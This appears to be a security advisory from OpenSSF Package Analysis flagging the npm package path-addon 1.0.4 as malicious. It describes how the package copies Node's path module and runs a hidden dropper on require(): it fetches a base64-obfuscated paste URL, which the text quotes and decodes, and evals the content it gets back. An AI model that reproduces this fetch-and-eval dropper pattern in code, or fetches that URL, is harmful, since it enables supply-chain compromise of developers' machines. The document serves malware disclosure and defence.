path-addon impersonates the Node.js core path module (package name path-addon, README claims to be 'an exact copy of the NodeJS path module'). The body of path.js is the genuine Joyent path implementation, but a remote-code-execution dropper has been inserted: on require(), the module calls fetch(atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9SRlc2SQ==")) — which decodes to https://www.jsonkeeper.com/b/RFW6I, an anonymous mutable JSON paste host — then reads the response's content field and passes it to eval(). The destination URL is base64-encoded specifically to evade casual review and string-based scanners. Any process that imports path-addon executes whatever JavaScript the attacker has placed at that paste URL at the moment of require(), with no integrity check, no pinning, and no version constraint. The combined shape (typosquat name + trojanized legitimate source + obfuscated fetch + eval of remote content at module load) is unambiguous attacker tooling.

The OpenSSF Package Analysis project identified 'path-addon' @ 1.0.4 (npm) as malicious.

It is considered malicious because:

• The package communicates with a domain associated with malicious activity.

• The package executes one or more commands associated with malicious behavior.